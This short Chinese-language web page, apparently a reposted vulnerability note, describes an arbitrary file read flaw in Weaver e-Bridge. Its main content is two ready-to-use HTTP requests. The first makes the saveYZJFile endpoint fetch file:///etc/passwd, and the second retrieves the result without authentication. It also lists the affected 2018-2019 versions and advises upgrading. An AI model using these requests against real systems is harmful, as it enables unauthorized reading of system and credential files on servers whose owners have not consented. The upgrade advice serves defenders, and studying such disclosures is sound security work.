泛微雲橋任意文件讀取漏洞


GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1
User-Agent: curl/7.29.0
Host: xxxxx
Accept: */*

  

 

 

GET /file/fileNoLogin/xxxxxxxxxx HTTP/1.1
User-Agent: curl/7.29.0
Host: xxxxx
Accept: */*

 提交上一步響應包中的id

 

 

 

漏洞影響版本:

  該漏洞幾乎影響2018-2019全版本

 

 處置建議:

升級至最新版


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM